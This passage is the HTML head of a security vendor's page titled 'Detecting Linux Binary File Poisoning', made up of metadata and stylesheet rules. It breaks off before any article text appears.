<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta http-equiv="x-ua-compatible" content="ie=edge"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/><meta name="generator" content="Gatsby 5.3.3"/><meta property="og:title" content="Detecting Linux Binary File Poisoning" data-gatsby-head="true"/><meta name="twitter:title" content="Detecting Linux Binary File Poisoning" data-gatsby-head="true"/><meta name="description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here's how to find it." data-gatsby-head="true"/><meta property="og:description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here's how to find it." data-gatsby-head="true"/><meta name="twitter:description" content="Binary poisoning is tampering with a Linux system command and replacing it with a malicious version. Here's how to find it." 
data-gatsby-head="true"/><meta name="twitter:site" content="@sandflysecurity" data-gatsby-head="true"/><meta name="twitter:card" content="summary_large_image" data-gatsby-head="true"/><meta property="article:modified_time" content="2021-11-02T17:54:39Z" data-gatsby-head="true"/><meta property="article:published_time" content="2018-06-13T12:00:00Z" data-gatsby-head="true"/><meta property="og:locale" content="en_EN" data-gatsby-head="true"/><meta property="og:type" content="article" data-gatsby-head="true"/><meta property="og:site_name" content="Sandfly Security - Agentless Linux Security and EDR" data-gatsby-head="true"/><meta property="og:image" content="https://www.datocms-assets.com/56687/1658984030-thumbnail-generic.png?w=1000&amp;fit=max&amp;fm=jpg" data-gatsby-head="true"/><meta name="twitter:image" content="https://www.datocms-assets.com/56687/1658984030-thumbnail-generic.png?w=1000&amp;fit=max&amp;fm=jpg" data-gatsby-head="true"/><meta property="og:image:width" content="1280" data-gatsby-head="true"/><meta property="og:image:height" content="720" data-gatsby-head="true"/><meta name="msapplication-square70x70" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=70&amp;h=70" data-gatsby-head="true"/><meta name="msapplication-square150x150" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=150&amp;h=150" data-gatsby-head="true"/><meta name="msapplication-square310x310" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=310&amp;h=310" data-gatsby-head="true"/><meta name="msapplication-square310x150" content="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=310&amp;h=150" data-gatsby-head="true"/><meta name="application-name" content="Sandfly Security" data-gatsby-head="true"/><style data-href="/styles.a75c8ea5eb8b5359fa2f.css" 
data-identity="gatsby-global-css">*{box-sizing:border-box}body{margin:0;overflow-x:hidden}main{display:block}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}form{margin:0}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em 
.625em}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{vertical-align:baseline}textarea{overflow:auto}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details{display:block}summary{display:list-item}[hidden],template{display:none}:export{brandBlack:#000;brandWhite:#fff;brandTeal:#21f4db;brandBlue:#91d0ff;brandPurple:#9a94f5;brandSlate:#2b2b2e;brandDarkgray:#c3c4c9;brandLightgray:#e8e9ec;primaryColor:#21f4db;primaryTint20:#4df6e2;primaryTint40:#7af8e9;primaryTint60:#a6fbf1;primaryTint80:#d3fdf8;primaryShade20:#1ec7b3;primaryShade40:#1c9a8b;primaryShade60:#196e64;primaryShade80:#17413c;secondaryTint20:#a7d9ff;secondaryTint40:#bde3ff;secondaryTint60:#d3ecff;secondaryTint80:#e9f6ff;secondaryShade20:#78aad0;secondaryShade40:#5f85a1;secondaryShade60:#465f72;secondaryShade80:#2d3a43;secondaryColor:#91d0ff;tertiaryColor:#9a94f5;accentColor:#21f4db;successColor:#66bb8b;warningColor:#fdb11f;errorColor:#f44336;black:#141414;white:#fff;backgroundColor:#fff;textColor:#2b2b2e;linkColor:#1ec7b3;lightGray:#f6f6f8;darkGray:#c3c4c9;primaryGradient:linear-gradient(135deg,#21f4db 40%,#91d0ff);mediumBreakpoint:700px;xlargeBreakpoint:1200px;xxlargeBreakpoint:1400px}.grecaptcha-badge{visibility:hidden}:root{--layout-sidebar-bg:hsla(0,0%,100%,.9)}.layout__sidebar{-webkit-font-smoothing:antialiased;background-color:var(--layout-sidebar-bg);bottom:0;color:#141414;left:0;position:fixed;right:0;top:0;z-index:15}@supports((-webkit-backdrop-filter:blur(10px)) or 
(backdrop-filter:blur(10px))){.layout__sidebar{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.9)}}.modal{bottom:0;color:#fff;left:0;position:fixed;right:0;top:0}.modal__loading{inset:0;margin:auto;position:absolute;z-index:-1}.modal__error{background-color:red;border-radius:.5rem;display:inline-block;inset:0;bottom:auto;margin:6rem auto auto;max-width:25rem;padding:1rem;position:absolute;text-align:center}.modal__error p:last-child{margin-bottom:0}.modal__close{align-items:center;background:none;border:0;color:currentColor;display:flex;position:absolute;right:1rem;top:1rem}.headroom{left:0;right:0;top:0;will-change:transform;z-index:20}.headroom-wrapper--sidebar .headroom{position:fixed;transform:translateY(-100%)}.headroom--unfixed{position:relative;transform:none}.layout--transparent-header .headroom--unfixed{position:absolute}.headroom--scrolled{transition:transform .2s ease-in-out,background-color 1ms linear}.headroom--unpinned{position:fixed;transform:translate3d(0,-100%,0)}.headroom--pinned{position:fixed;transform:translateZ(0)}.layout--transparent-header .headroom-wrapper{left:0;position:absolute;right:0;top:0}h2,h3{line-height:1.25;margin-bottom:1.25rem}h2{font-size:2rem;font-weight:600;letter-spacing:-.01em}.ss--accordion{border-top:2px solid #141414;margin:auto;max-width:90rem;position:relative}.ss--accordion button{color:currentColor}.ss--accordion h4{margin:0;text-align:left}@media print,screen and (min-width:64em){.ss--accordion h4{font-size:1.5rem}}.ss--accordion p:last-child{margin:0}.ss--accordion__item{border-bottom:1px solid;padding:1.25rem 0;position:relative}.ss--accordion__content{padding-top:1.25rem}.ss--accordion__header{align-items:center;background:transparent;border:0;display:flex;justify-content:space-between;padding:0 1.25rem 0 
0;width:100%}.ss--accordion__icon{align-items:center;border-radius:100%;color:currentColor;display:flex;height:1.875rem;justify-content:center;width:1.875rem}.ss--accordion__icon svg{font-size:.875rem;height:1em;transform:rotate(90deg);width:1em}.ss--block{position:relative}.ss--block--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--block--gutters{padding-left:0;padding-right:0}}.ss--block--bg-gray{background-color:#f6f6f8}.ss--block--bg-primary-gradient{background:linear-gradient(135deg,#21f4db 40%,#91d0ff)}.ss--blockquote blockquote{font-size:1.3125rem;margin:0;padding:1.25rem 0}@media screen and (min-width:49.25em){.ss--blockquote blockquote{padding:1.25rem 1.875rem}}.ss--breadcrumbs{font-size:.875rem;margin:0 auto;max-width:73.125rem;padding:1.25rem 1.25rem 0}@media screen and (min-width:75em){.ss--breadcrumbs{padding:1.25rem 0 0}}.ss--breadcrumbs ul{line-height:1}.ss--breadcrumbs a{color:#2b2b2e;text-decoration:none}.ss--breadcrumbs__list{list-style:none;margin:0 0 2.5rem;padding:0}.ss--breadcrumbs__item{display:inline-block;margin:0 0 .3125rem}.ss--breadcrumbs__item:not(:last-child):after{color:rgba(43,43,46,.5);content:"/";display:inline-block;padding:0 .5em}:root{--button-text-color:#fff;--button-bg-color:#141414;--button-bg-active:#3f3f43;--button-bg-hover:#3f3f43;--button-border-color:#2b2b2e}.ss--button{align-items:center;background:var(--button-bg-color);border:0;border-radius:2rem;box-shadow:none;color:var(--button-text-color);cursor:pointer;display:flex;font-size:.875rem;font-weight:600;justify-content:center;line-height:normal;overflow:hidden;padding:.6em 1.5em;position:relative;text-align:center;text-decoration:none;width:100%}@media print,screen and (min-width:43.75em){.ss--button{font-size:1rem;width:-webkit-max-content;width:max-content}}.ss--button:after{background-color:currentColor;content:"";inset:0;opacity:0;position:absolute;transition:background .25s ease,opacity .25s 
ease}.ss--button:focus:after,.ss--button:hover:after{opacity:.1}.ss--button:active:after{opacity:.2}.ss--button[disabled]{box-shadow:none;opacity:.75;pointer-events:none}.ss--button span{color:var(--button-text-color);pointer-events:none;-webkit-user-select:none;user-select:none}.ss--button__icon{display:block;height:1em;line-height:1;width:1em}.ss--button__icon:first-child{margin-right:.5rem}.ss--button__icon:last-child{margin-left:.5rem}.ss--button--color-secondary{--button-text-color:#141414;--button-bg-color:#91d0ff;--button-bg-active:#68bfff;--button-bg-hover:#78c5ff;--button-border-color:#91d0ff}.ss--button--color-accent{--button-text-color:#141414;--button-bg-color:#21f4db;--button-bg-active:#0be1c8;--button-bg-hover:#0cf0d5;--button-border-color:transparent}.ss--button--color-white{--button-text-color:#141414;--button-bg-color:#fff;--button-bg-active:hsla(0,0%,100%,.08);--button-bg-hover:hsla(0,0%,100%,.05);--button-border-color:#141414}.ss--button--color-black{--button-text-color:#fff;--button-bg-color:#141414;--button-bg-active:hsla(0,0%,8%,.08);--button-bg-hover:hsla(0,0%,8%,.05);--button-border-color:#fff}.ss--button--style-bordered{background:linear-gradient(var(--button-bg-color),var(--button-bg-color)) padding-box,linear-gradient(45deg,#91d0ff,#9a94f5) border-box;border:2px solid transparent}.ss--button--style-unstyled{--button-text-color:var(--button-bg-color);background:none;border:none;box-shadow:none;cursor:pointer;display:inline-block;font-family:inherit;font-size:1rem;margin:0;padding:0;position:relative;text-align:left;width:unset}.ss--button--style-unstyled:focus,.ss--button--style-unstyled:hover{background:none;opacity:.85}.ss--button--style-unstyled:active{background:none}.ss--button--style-unstyled:after{display:none}.ss--button--elevated{box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px 
rgba(0,0,0,.07)}.ss--button--alignment-center{margin:1rem auto 0}.ss--button--width-full{width:100%}@media print,screen and (min-width:43.75em){.ss--button--width-full{max-width:20rem}}.ss--button--menu-item{--button-text-color:currentColor;--button-bg-color:transparent;--button-bg-active:transparent;--button-bg-hover:transparent;background:none;border:0;cursor:pointer;display:inline-block;font-size:1rem;font-weight:400;padding:0;position:relative;text-align:left;text-decoration:none;text-transform:none;width:100%}.ss--button--menu-item:active,.ss--button--menu-item:hover{border:0;opacity:.7}.ss--button--menu-item:active:after,.ss--button--menu-item:hover:after{opacity:0}.ss--button--close{left:1rem;position:absolute;top:1rem}.ss--button--size-large{font-size:1.25rem}.ss--checkbox{display:flex;padding-bottom:1rem}.ss--checkbox input{clip:rect(0,0,0,0)!important;align-items:center;border:0!important;display:flex;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--checkbox label{align-items:flex-start;display:flex;font-size:1rem;text-align:left}.ss--checkbox label svg{color:#21f4db;cursor:pointer;margin:0 1rem .125rem 0;min-height:1.25rem;min-width:1.25rem}.ss--checkbox [type=checkbox]{display:block;margin-right:1rem;margin-top:.4rem;min-width:.8rem}.ss--checkbox [type=checkbox]::placeholder{opacity:.4}.ss--checkbox__checked{display:flex;position:relative}.ss--checkbox__checked .ss--checkbox__check{bottom:0;left:0;position:absolute;right:0;top:0}.ss--checkbox__checked .ss--checkbox__check svg{color:#141414}.ss--checkbox--error .ss--checkbox__error{color:#f44336}.ss--chip{position:relative}.ss--chip__link.ss--chip__link{border:2px solid;border-radius:1em;color:#1ec7b3;display:inline-block;font-size:.875rem;font-weight:500;line-height:1;padding:.25em 
.5em}.ss--chip__link.ss--chip__link:active,.ss--chip__link.ss--chip__link:hover{color:#1c9a8b}.ss--chip__link.ss--chip__link[aria-current]{background-color:#1ec7b3}.ss--chip__link.ss--chip__link[aria-current]:active,.ss--chip__link.ss--chip__link[aria-current]:hover{background-color:#1c9a8b}.ss--chip--elevated a{box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px rgba(0,0,0,.07)}.ss--chips{align-content:center;display:flex;flex-direction:row;gap:.625rem;overflow-x:scroll;padding:1.25rem}@media screen and (min-width:75em){.ss--chips{flex-wrap:wrap;overflow:hidden}}.ss--content a:not(.ss--button):not(.ss--chip__link){color:#1ec7b3;font-weight:400}.ss--content a:not(.ss--button):not(.ss--chip__link):focus,.ss--content a:not(.ss--button):not(.ss--chip__link):hover{color:#1c9a8b}.ss--content>h1{margin-bottom:2.5rem}.ss--content>h1:last-child,.ss--content>p:last-child{margin-bottom:0}.ss--content ul{margin:0 0 1rem 1.25rem;padding:0}.ss--content li{font-weight:300;line-height:1.5;margin-bottom:.625rem}.ss--content--bg-gray{background-color:#e8e9ec}.ss--content--bg-primary-gradient{background:linear-gradient(135deg,#21f4db 40%,#91d0ff)}.ss--content--text-align-left{text-align:left}.ss--content--text-align-center{text-align:center}.ss--content--text-align-right{text-align:right}.ss--content--vertically-align-center{display:flex;flex-direction:column;justify-content:center}.ss--content--width-large,.ss--content--width-medium,.ss--content--width-small{margin:0 auto}.ss--content--width-small{max-width:48rem}.ss--content--width-medium{max-width:73.125rem}.ss--content--width-large{max-width:90rem}.ss--content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--content--gutters{padding-left:0;padding-right:0}}.ss--content--improved-typography h1,.ss--content--improved-typography h2,.ss--content--improved-typography 
h3,.ss--content--improved-typography h4{margin-bottom:.75em}.ss--content--improved-typography>h2:not(:first-child){margin-top:2.5rem}.ss--content--improved-typography>p{margin-bottom:1.5625rem}.ss--content--improved-typography>blockquote{border-left:4px solid #21f4db;margin-bottom:2.5rem;margin-left:0;margin-top:2.5rem;padding-bottom:.25rem;padding-left:2.5rem;padding-top:.25rem}.ss--content--improved-typography>blockquote p:last-child{margin-bottom:0}.ss--copyright{align-items:flex-start;display:flex;font-size:.875rem;justify-content:space-between;padding:2.5rem 0 0;text-align:center}@media screen and (min-width:75em){.ss--copyright{text-align:left}}.ss--copyright p{margin-bottom:0}.ss--copyright__link.ss--copyright__link{max-width:400px;text-decoration:underline}.ss--copyright__veracode{display:block;text-align:center}.ss--copyright__veracode>div{margin:.5rem auto}.ss--cta{display:grid;overflow:hidden;position:relative;text-align:center;width:100%}@media screen and (min-width:75em){.ss--cta{padding-left:0;padding-right:0}}.ss--cta h1{font-size:2.625rem;margin-bottom:1.25rem}.ss--cta p{font-size:1.25rem;font-weight:400;margin-bottom:1.6625rem}.ss--cta__image.ss--cta__image{inset:0;object-fit:cover;object-position:50% 50%;position:absolute}.ss--cta__content{position:relative;z-index:3}.ss--cta__logos{padding-bottom:2rem}.ss--cta--color-accent,.ss--cta--color-primary,.ss--cta--color-secondary{color:#fff}.ss--cta--color-primary{background-color:#21f4db}.ss--cta--color-secondary{background-color:#91d0ff}.ss--cta--color-accent{background-color:#21f4db}.ss--cta--color-primaryGradient{background-color:#33a49b;background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);background-position:50%;background-repeat:no-repeat;background-size:cover;color:#2b2b2e}.ss--cta--variant-hero{background-color:#141414;background-image:radial-gradient(circle at 85%,#21f4db 0,rgba(33,244,219,.05) 50%,rgba(33,244,219,0) 100%);color:#fff}.ss--cta--variant-hero 
svg{color:#141414}.ss--cta--variant-hero .ss--cta__content{padding:15rem 1.25rem 11.25rem}@media print,screen and (min-width:64em){.ss--cta--variant-hero .ss--cta__content{text-align:left;width:40%}}@media screen and (min-width:75em){.ss--cta--variant-hero .ss--cta__content{padding:20rem 1.25rem 15rem 0}}@media print,screen and (min-width:64em){.ss--cta--variant-hero .ss--cta__content>a{margin-left:0}}.ss--cta--variant-hero .ss--cta__sizer{margin:auto;max-width:73.125rem;width:100%}.ss--cta--variant-default .ss--cta__content{padding:5rem 1.25rem}.ss--disclaimer p{font-size:.875rem;margin-bottom:0}.ss--drill-down{font-size:1.125rem;margin-top:4.125rem}.ss--drill-down__child,.ss--drill-down__list{list-style-type:none;margin:0;padding:0 1.25rem}.ss--drill-down__child li:not(:last-child):not(.ss--drill-down__subheading):after,.ss--drill-down__list li:not(:last-child):not(.ss--drill-down__subheading):after{background-color:#fff;content:"";display:block;height:1px;opacity:.5;width:100%}.ss--drill-down__subheading h4{padding-top:.75rem;text-transform:uppercase}.ss--drop-down{color:#2b2b2e;position:absolute;top:3.125rem;width:17.5rem}.ss--drop-down__list{background-color:#fff;border-radius:0 0 .25rem .25rem;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#2b2b2e;list-style:none;margin:0;padding:0 1.25rem;transition:background-color .3s linear}.ss--drop-down--closed{pointer-events:none}.ss--drop-down--open{position:absolute}.headroom--unpinned .ss--drop-down--open{opacity:0;pointer-events:none}.ss--title-with-icon{display:flex;gap:.625rem}.ss--title-with-icon h3{width:100%}.ss--title-with-icon svg{color:#21f4db;font-size:1.575rem;height:1em;margin-bottom:1rem;width:1em}.ss--figure figure{margin:0 0 1.25rem}.ss--figure 
figcaption{color:#c3c4c9;font-style:italic;text-align:center}.ss--footer{background-color:#141414;color:#fff}.ss--footer a{color:currentColor;font-weight:600;text-decoration:none}.ss--footer a:visited{color:inherit}.ss--footer a:hover{opacity:.8}.ss--footer svg{color:#21f4db;font-size:1.25rem;margin-right:.625rem}.ss--footer ul{font-size:.875rem;list-style-type:none;margin:0;padding:1.25rem 0 0}.ss--footer li:not(:last-of-type),.ss--footer li:not(:only-of-type){margin-bottom:.625rem}.ss--footer__container{margin:0 auto;max-width:73.125rem;padding:1.25rem}@media screen and (min-width:75em){.ss--footer__container{padding:1.25rem 0}}.ss--footer__wrapper{display:flex;flex-direction:column-reverse;flex-wrap:wrap;gap:2.5rem}@media print,screen and (min-width:43.75em){.ss--footer__wrapper{flex-direction:row}}@media screen and (min-width:75em){.ss--footer__wrapper{display:grid;grid-template-columns:repeat(4,1fr)}}.ss--footer__menu{padding-bottom:2.5rem}@media screen and (min-width:75em){.ss--footer__menu{padding-bottom:0}}.ss--footer__menu:first-of-type{grid-row:1/2}.ss--footer__menu:last-of-type{grid-row:2/3}.ss--footer__menu:last-of-type svg{font-size:2rem}@media screen and (min-width:75em){.ss--footer__menu:not(:first-of-type):not(:last-of-type){grid-row:1/3}}.ss--footer__menu a[aria-current]{color:#21f4db}.ss--footer__menu button,.ss--footer__menu form{font-size:.875rem}.ss--footer__menu form{padding-top:1.25rem}.ss--footer__menu form input{height:auto}.ss--footer__menu-heading:after{background-color:#fff;content:"";display:block;height:1px;opacity:.5;top:1.25rem;width:100%}.ss--footer__social{display:flex}.ss--form button{margin-top:.3125rem}.ss--form fieldset{border:none;margin:0;padding:0}.ss--form__statement{text-align:left}.ss--form__response{padding-bottom:1.25rem}.ss--form__reponse-body{text-align:center}.ss--grid{margin:0 auto;max-width:74.375rem}@media screen and 
(min-width:75em){.ss--grid{overflow:unset}}.ss--grid__wrapper{display:flex;flex-direction:column;gap:1.25rem}@media print,screen and (min-width:64em){.ss--grid__wrapper{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--grid--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--grid--gutters{padding-left:0;padding-right:0}}.ss--grid--nested{margin:0;padding:0}.ss--grid--nested .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(2,1fr)}@media print,screen and (min-width:64em){.ss--grid--nested .ss--grid__wrapper{grid-template-columns:repeat(4,1fr)}}.ss--grid--nested .ss--grid__wrapper>div>div{display:flex;justify-content:center}.ss--grid--scroll-mobile{overflow:scroll;padding:0}.ss--grid--scroll-mobile .ss--grid__wrapper{display:inline-flex;gap:1.25rem}@media screen and (min-width:75em){.ss--grid--scroll-mobile .ss--grid__wrapper>div{margin-bottom:0}}.ss--grid--col-1 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(1,1fr)}@media screen and (min-width:75em){.ss--grid--col-3 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(3,1fr)}}@media screen and (min-width:31.25em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(2,1fr)}}@media screen and (min-width:50em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(3,1fr)}}@media print,screen and (min-width:64em){.ss--grid--col-4 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(4,1fr)}}@media screen and (min-width:31.25em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(2,1fr)}}@media screen and (min-width:50em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;grid-template-columns:repeat(4,1fr)}}@media print,screen and (min-width:64em){.ss--grid--col-8 .ss--grid__wrapper{display:grid;gap:1.25rem;grid-template-columns:repeat(8,1fr)}}.ss--grid--gap-large .ss--grid__wrapper{gap:2.5rem}@media 
print,screen and (max-width:74.99875em){.ss--grid--gap-none-mobile .ss--grid__wrapper{gap:0}.ss--grid--gap-none-mobile .ss--grid__wrapper>div{margin:0}.ss--grid--gap-none-mobile .ss--grid__wrapper ul{margin-bottom:0}}.ss--grid--reverse .ss--grid__wrapper{flex-direction:column-reverse}.ss--grid--justify-center{justify-content:center}:root{--header-bg:#fff;--header-bg-fallback:#fff;--header-color:#2b2b2e}.ss--header{background-color:var(--header-bg-fallback);position:relative;transition:background-color .3s linear;z-index:10}@supports((-webkit-backdrop-filter:blur(10px)) or (backdrop-filter:blur(10px))){.ss--header{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.5)}}.layout--transparent-header .ss--header{-webkit-backdrop-filter:none;backdrop-filter:none;background-color:transparent;box-shadow:none;color:#fff;position:relative}.layout--transparent-header .headroom--pinned .ss--header{background-color:hsla(0,0%,100%,.5);box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#2b2b2e;transition:background-color .3s linear;z-index:10}@supports((-webkit-backdrop-filter:blur(10px)) or (backdrop-filter:blur(10px))){.layout--transparent-header .headroom--pinned .ss--header{-webkit-backdrop-filter:blur(10px);backdrop-filter:blur(10px);background-color:hsla(0,0%,100%,.8)}}.ss--header__container{margin:0 auto;max-width:73.125rem}.ss--header__wrapper{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-end;padding:.625rem 1.25rem;position:relative}@media screen and (min-width:75em){.ss--header__wrapper{padding:.625rem 0 1.25rem}}.ss--header__top .ss--header__wrapper{font-size:.75rem;letter-spacing:.1em;padding:.4166666667rem 
0;text-transform:uppercase}.ss--header__logo{align-self:center;color:currentColor;line-height:1;margin-right:auto;max-width:9rem;position:relative;z-index:2}.ss--header__logo>:first-child{display:none}@media print,screen and (min-width:43.75em){.ss--header__logo{justify-self:flex-start;max-width:15rem}.ss--header__logo>:first-child{display:inline-block}.ss--header__logo>:last-child{display:none}}@media screen and (min-width:75em){.ss--header__logo{max-width:20rem}}.ss--header__menu{display:none}@media screen and (min-width:75em){.ss--header__menu{display:block;margin-right:0}}.ss--header__cta{display:none}@media screen and (min-width:22.5em){.ss--header__cta{display:flex}}@media screen and (min-width:75em){.ss--header__cta{margin-left:1em}}.ss--header__cta>*{margin:0}.ss--header__icon button,.ss--header__icon span{display:flex}.ss--header__icon button{cursor:pointer}.ss--header__icon rect{fill:currentColor}@media screen and (min-width:75em){.ss--header__icon{display:none}}.ss--header__top{color:currentColor;display:none;transition:color .2s linear}@media screen and (min-width:75em){.ss--header__top{display:block}}.ss--header__link{color:currentColor;font-weight:700;transition:color .25s ease,opacity .25s ease}.ss--header__link:focus,.ss--header__link:hover{opacity:.65}.ss--header__link:not(:first-child){margin-left:1.25rem}.ss--header__link--parent{color:#21f4db}.ss--header__phone{justify-self:start;margin-left:0;margin-right:auto}.ss--hero{background-color:#33a49b;background-image:url(/hero-bg.webp);background-position:50%;background-repeat:no-repeat;background-size:cover;color:#fff;padding:11.25rem 0}.ss--hero p{font-size:1.25rem;font-weight:400}.ss--icon{align-items:center;display:flex;justify-content:center}.ss--image{margin:auto;position:relative;width:100%}.image-with-content .ss--image{align-content:center}.ss--image 
img{margin-bottom:0}.ss--image__image{background-color:#f6f6f8;border-radius:.5rem;overflow:hidden}.ss--image__logo:not(img){bottom:1.25rem;left:1.25rem;position:absolute}.ss--image__zoom{background:transparent;border:0;bottom:1.25rem;color:#fff;filter:drop-shadow(1px 1px 4px rgba(20,20,20,.5));opacity:0;position:absolute;right:1.25rem;transform:translate(100%,100%);transition:all .25s cubic-bezier(.17,.67,.37,.95)}:hover>.ss--image__zoom{opacity:1;transform:translate(0)}.ss--image--width-small{max-width:48rem}.ss--image--width-medium{max-width:73.125rem}.ss--image--width-large{max-width:90rem}.ss--image--width-full{max-width:unset}.ss--image--width-full .ss--image__wrap>div{border-radius:0}.ss--image--elevated .ss--image__image{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--image--lightbox{position:relative}.ss--image-list{display:grid;gap:16px 16px}.ss--image-list__item>*{border-radius:.25rem}.ss--image-list--logo-grid{grid-auto-rows:1fr;grid-template-columns:repeat(4,1fr);max-width:100%}.ss--image-list--logo-grid-small{align-items:center;display:flex;flex-wrap:wrap;justify-content:center;mix-blend-mode:screen}.ss--image-list--logo-grid-small .ss--image-list__item{align-self:center;filter:invert(1) grayscale(1) brightness(2);justify-self:center;max-width:50px}@media print,screen and (min-width:43.75em){.ss--image-list--logo-grid-small .ss--image-list__item{max-width:none}}.ss--image-list--elevated .ss--image-list__item>*{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--image-with-content{display:flex;flex-direction:column-reverse;gap:1.25rem;margin:0 auto;max-width:73.125rem}@media print,screen and 
(min-width:64em){.ss--image-with-content{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--image-with-content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--image-with-content--gutters{padding-left:0;padding-right:0}}.ss--image-with-content--image-left>div{grid-row:1/2}.ss--image-with-content--image-left>div:first-of-type{grid-column:2/3}.ss--image-with-content--image-left>div:last-of-type{grid-column:1/2}.ss--input{padding-bottom:1.25rem}.ss--input input{-webkit-appearance:none;appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;height:2.8125rem;margin-top:.3125rem;padding:.75em 1em;width:100%}.ss--input input::placeholder{opacity:.4}.ss--input label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--lazy-iframe{background-color:#141414;padding-top:56.25%;position:relative}.ss--lazy-iframe,.ss--lazy-iframe iframe{border-radius:.5rem;overflow:hidden;width:100%}.ss--lazy-iframe iframe{height:100%;left:0;position:absolute;top:0}.ss--lazy-iframe--elevated{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--menu__list{display:flex;list-style:none;margin:0;padding:0}.ss--menu__list .ss--menu__item,.ss--menu__list span{display:flex}.ss--menu__list .ss--menu__item{padding:0}.ss--menu__toggle{background:none;border:0;color:inherit;padding:0}.ss--menu__item{display:inline-block;margin:0;padding:.5em 0}.ss--menu__item--button{background-color:#21f4db;border-radius:2rem;box-shadow:0 .2px 2.2px rgba(0,0,0,.02),0 .4px 5.3px rgba(0,0,0,.028),0 .8px 10px rgba(0,0,0,.035),0 1.3px 17.9px rgba(0,0,0,.042),0 2.5px 33.4px rgba(0,0,0,.05),0 6px 80px 
